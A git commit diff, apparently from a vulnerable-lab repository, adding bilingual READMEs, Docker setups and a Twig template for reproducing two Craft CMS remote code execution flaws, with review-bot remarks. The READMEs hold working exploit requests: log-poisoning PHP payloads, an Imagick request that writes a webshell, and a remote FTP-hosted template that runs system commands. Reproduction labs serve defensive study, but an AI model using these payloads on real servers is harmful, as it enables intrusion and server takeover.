first commit
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

Binary image files added (not shown): 46 KiB, 49 KiB, 74 KiB, 35 KiB, 45 KiB.


@@ -0,0 +1,126 @@
# CraftCMS ConditionsController Pre-Auth Remote Code Execution (CVE-2023-41892)
[中文版本(Chinese version)](README.zh-cn.md)
Craft CMS is a flexible, user-friendly CMS for creating custom digital experiences on the web. It provides users with a backend interface to implement websites and configure the CMS.
A vulnerability in Craft CMS versions 4.4.0 through 4.4.14 allows unauthenticated attackers to achieve remote code execution through the `ConditionsController`. The vulnerability exists due to insufficient input validation in the controller's `beforeAction` method, which can be exploited to create arbitrary objects and achieve code execution.
References:
- <https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g>
- <https://blog.calif.io/p/craftcms-rce>
- <https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/>
## Environment Setup
Execute the following command to start a vulnerable Craft CMS 4.4.14:
```
docker compose up -d
```
After the server is running, you can see the installation page at `http://your-ip:8088/admin/install`. Please follow the instructions to install CraftCMS, the default database address is `db` and the username and password are both `root`.
![](1.png)
## Vulnerability Reproduction
The root cause of the vulnerability is that the attacker can send a specially crafted HTTP request to create arbitrary objects through PHP object injection. By chaining multiple gadgets in the codebase, the attacker can achieve remote code execution.
There are two common gadgets that can be used to achieve remote code execution.
### Gadget 1: `craft\elements\conditions\users\UserCondition` with `\Psy\Configuration`
This gadget requires server logging to be enabled, which is enabled by default.
First, send a POST request with a syntax error JSON to write the payload to the log file:
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa
<?php
@phpinfo(); __halt_compiler();
?>
}
```
![](2.png)
Then, trigger the remote code execution by including the log file through the `\Psy\Configuration` gadget (replace the `2025-03-31` with your current date):
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
"config": {
"name": "test",
"as xyz": {
"class": "\\Psy\\Configuration",
"__construct()": {
"config": {
"configFile": "../storage/logs/web-2025-03-31.log"
}
}
}
},
"test": "craft\\elements\\conditions\\users\\UserCondition"
}
```
![](3.png)
As you can see, the PHPINFO is executed successfully.
### Gadget 2: `craft\elements\conditions\users\UserCondition` with built-in `Imagick` class
If the Imagick extension is enabled, you can use the `Imagick` class with MSL format to write arbitrary files:
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytlNPtAxuuGOeUqqY
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="test"
craft\elements\conditions\users\UserCondition
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[name]"
test
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][class]"
imagick
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][__construct()][0][0]"
vid:msl:/tmp/php*
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="file"; filename="1.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?=phpinfo();?&gt;"/>
<write filename="info:webshell.php" />
</image>
------WebKitFormBoundarytlNPtAxuuGOeUqqY--
```
This payload will execute PHP code like `new Imagick('vid:msl:/tmp/php*');`, and cause the "Segmentation fault" error, which makes the thread crash:
![](4.png)
But the `webshell.php` file is written successfully:
![](5.png)
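Review bot: the root-cause sentence at the top of "Vulnerability Reproduction" ("the attacker can send a specially crafted HTTP request to create arbitrary objects through PHP object injection") mislabels the bug: nothing in these requests is deserialized; the intro paragraph and the ptsecurity reference both describe arbitrary object instantiation, where `config[as xyz][class]` and `__construct()` are handed to the object factory with attacker-chosen arguments. Suggest "to instantiate arbitrary classes with attacker-controlled constructor arguments (arbitrary object instantiation)" so the two paragraphs agree. Two documentation gaps: Gadget 2 closes with "But the `webshell.php` file is written successfully" without saying where `info:webshell.php` lands or which URL to request to confirm it, and the Gadget 1 path `../storage/logs/web-2025-03-31.log` is relative, so the "replace the date" hint should also say which directory it is resolved from. Finally, this file uses `docker compose up -d` while the CVE-2024-56145 README in the same commit uses `docker-compose up -d`; pick one form for the repository.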


@@ -0,0 +1,124 @@
# CraftCMS未授权远程代码执行漏洞CVE-2023-41892
Craft CMS是一个灵活、用户友好的内容管理系统用于在Web上创建自定义的数字体验。它为用户提供了一个后端界面来实现网站并配置CMS。
Craft CMS 4.4.0至4.4.14版本中存在一个远程代码执行漏洞。未经身份验证的攻击者可以通过`ConditionsController`实现远程代码执行。该漏洞存在于控制器的`beforeAction`方法中,由于输入验证不足,攻击者可以利用该漏洞创建任意对象并实现代码执行。
参考链接:
- <https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g>
- <https://blog.calif.io/p/craftcms-rce>
- <https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/>
## 环境搭建
执行如下命令启动一个存在漏洞的Craft CMS 4.4.14环境:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8088/admin/install`即可看到CraftCMS的安装页面。请按照页面提示完成安装默认数据库地址为`db`,用户名和密码均为`root`
![](1.png)
## 漏洞复现
漏洞的根本原因是攻击者可以通过PHP对象注入发送特制的HTTP请求来创建任意对象。通过链接代码库中的多个gadget攻击者可以实现远程代码执行。
有两种常用的gadget组合可以实现远程代码执行。
### Gadget 1使用`craft\elements\conditions\users\UserCondition`和`\Psy\Configuration`
这个gadget需要服务器开启日志记录功能该功能默认是开启的。
首先发送一个包含语法错误的JSON的POST请求将payload写入日志文件
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa
<?php
@phpinfo(); __halt_compiler();
?>
}
```
![](2.png)
然后,通过`\Psy\Configuration` gadget包含日志文件来触发远程代码执行请将`2025-03-31`替换为当前日期):
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
"config": {
"name": "test",
"as xyz": {
"class": "\\Psy\\Configuration",
"__construct()": {
"config": {
"configFile": "../storage/logs/web-2025-03-31.log"
}
}
}
},
"test": "craft\\elements\\conditions\\users\\UserCondition"
}
```
![](3.png)
如图所示PHPINFO成功执行。
### Gadget 2使用`craft\elements\conditions\users\UserCondition`和内置的`Imagick`类
如果服务器启用了Imagick扩展可以使用`Imagick`类的MSL格式来写入任意文件
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytlNPtAxuuGOeUqqY
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="test"
craft\elements\conditions\users\UserCondition
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[name]"
test
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][class]"
imagick
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][__construct()][0][0]"
vid:msl:/tmp/php*
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="file"; filename="1.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?=phpinfo();?&gt;"/>
<write filename="info:webshell.php" />
</image>
------WebKitFormBoundarytlNPtAxuuGOeUqqY--
```
这个payload会执行类似`new Imagick('vid:msl:/tmp/php*');`的PHP代码并导致"Segmentation fault"错误,使线程崩溃:
![](4.png)
但是`webshell.php`文件已经成功写入:
![](5.png)
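Review bot: this zh-cn file mirrors the English README, including the "PHP对象注入" (PHP object injection) wording in the first paragraph of "漏洞复现", which the file's own intro contradicts by describing the creation of arbitrary objects through `beforeAction`; change it to 任意对象实例化 (arbitrary object instantiation) together with the English file so the two stay in sync. The zh-cn file also has no link back to the English version, while README.md opens with a link to README.zh-cn.md; add the reciprocal link.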


@@ -0,0 +1,12 @@
services:
web:
image: vulhub/craftcms:4.4.14
depends_on:
- db
ports:
- "8088:80"
db:
image: mysql:5.7
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=craftcms
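Review bot: `depends_on: - db` only orders container start-up and does not wait for MySQL to finish initializing, so a user who opens `/admin/install` right after `docker compose up -d` can get a database connection error on the first attempt. Suggest a `healthcheck` on `db` (for example `test: ["CMD", "mysqladmin", "ping", "-h", "localhost", "-uroot", "-proot"]`) and `depends_on: db: condition: service_healthy` on `web`. The CVE-2024-56145 compose file in this commit has the same shape and would benefit from the same change.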

Binary image files added (not shown): 46 KiB, 45 KiB.


@@ -0,0 +1,52 @@
# CraftCMS `register_argc_argv` Leads to Remote Code Execution (CVE-2024-56145)
[中文版本(Chinese version)](README.zh-cn.md)
CraftCMS is a PHP-based content management system for building websites and applications.
CraftCMS version before 5.5.2 and 4.13.2 is vulnerable to remote code execution if the PHP setting `register_argc_argv` is enabled. When `register_argc_argv` is enabled, CraftCMS incorrectly reads configuration items from the HTTP request, allowing an attacker to control template files using the `--templatesPath`, which can lead to arbitrary code execution through template injection.
Reference:
- <https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9>
- <https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms>
## Vulnerable Environment
Execute the following command to start a CraftCMS server 5.5.1.1:
```
docker-compose up -d
```
After the server is running, you can see the installation page at `http://<your-ip>:8088/admin/install`. Please follow the instructions to install CraftCMS, the default database address is `db` and the username and password are both `root`.
![](1.png)
## Vulnerability Reproduction
To reproduce the vulnerability, you need to prepare a craft `index.twig` file which contains the following content, then place it on any remote server:
```twig
{{ ['system', 'id'] | sort('call_user_func') | join('') }}
```
Then start a FTP server in the server where the `index.twig` file is located:
```bash
# install pyftpdlib
pip install pyftpdlib
# start a FTP server
python -m pyftpdlib -p 21212 -V
```
Then you can exploit the vulnerability by sending the following request:
```
http://<your-ip>:8088/?--templatesPath=ftp://<evil-ip>:21212/
```
![](2.png)
As you can see, the `id` command is executed and the output is returned.
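Review bot: the reproduction steps never say why the template directory has to be served over FTP rather than plain HTTP, and "you need to prepare a craft `index.twig` file ... then place it on any remote server" reads as if the reader must write it, although this same commit ships `index.twig` beside the README; state that the file is provided, and that `python -m pyftpdlib -p 21212 -V` must be run from the directory containing it (pyftpdlib serves its working directory unless `-d <dir>` is given; `-V` only enables verbose logging). Wording in the description: "CraftCMS version before 5.5.2 and 4.13.2 is vulnerable" should be "CraftCMS versions before 5.5.2 and 4.13.2 are vulnerable", and "Reference:" introduces two links, so "References:" as in the CVE-2023-41892 README. This file also uses `docker-compose up -d` where the other README uses `docker compose up -d`.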


@@ -0,0 +1,50 @@
# CraftCMS `register_argc_argv` 导致远程代码执行漏洞CVE-2024-56145
CraftCMS 是一个基于 PHP 的内容管理系统,用于构建网站和应用程序。
CraftCMS 5.5.2 和 4.13.2 之前的版本存在潜在的远程代码执行漏洞。当 PHP 环境启用 `register_argc_argv`CraftCMS 会错误地从 HTTP 请求中读取配置项,攻击者可以使用 `--templatesPath` 控制模板文件,并利用模板注入导致任意代码执行。
参考链接:
- <https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9>
- <https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms>
## 漏洞环境
执行以下命令启动一个 CraftCMS 5.5.1.1 服务器:
```
docker-compose up -d
```
服务器启动后,你可以在 `http://<your-ip>:8088/admin/install` 看到安装页面。请按照说明安装 CraftCMS默认数据库地址为 `db`,用户名和密码均为 `root`
![](1.png)
## 漏洞复现
要复现该漏洞,你需要准备一个包含以下内容的 `index.twig` 文件并放置在任意远程服务器上:
```twig
{{ ['system', 'id'] | sort('call_user_func') | join('') }}
```
然后在 `index.twig` 文件所在的服务器中启动一个 FTP 服务器:
```bash
# 安装 pyftpdlib
pip install pyftpdlib
# 启动 FTP 服务器
python -m pyftpdlib -p 21212 -V
```
然后你可以通过发送以下请求来利用该漏洞:
```
http://<your-ip>:8088/?--templatesPath=ftp://<evil-ip>:21212/
```
![](2.png)
如你所见,`id` 命令被成功执行并返回了结果。
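Review bot: same points as the English README: the "漏洞复现" section does not mention that `index.twig` is shipped with the environment, the FTP step does not say to start pyftpdlib in the directory holding `index.twig` (or to pass `-d`), and "docker-compose up -d" differs from the `docker compose up -d` used by the CVE-2023-41892 zh-cn README in this commit.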


@@ -0,0 +1,12 @@
services:
web:
image: vulhub/craftcms:5.5.1.1
depends_on:
- db
ports:
- "8088:80"
db:
image: mysql:8.4
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=craftcms


@@ -0,0 +1 @@
{{ ['system', 'id'] | sort('call_user_func') | join('') }}
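Review bot: the template carries no comment explaining the gadget, and the README only calls it "a craft `index.twig` file"; a one-line Twig comment such as `{# sort() passes the two elements to the comparator, so call_user_func('system', 'id') runs id #}` would document why `sort('call_user_func')` yields command execution and which element to replace with another command. The README should also say that the filename is not arbitrary, since the request to `/` is what makes Craft load the `index` template from the attacker-supplied `--templatesPath`.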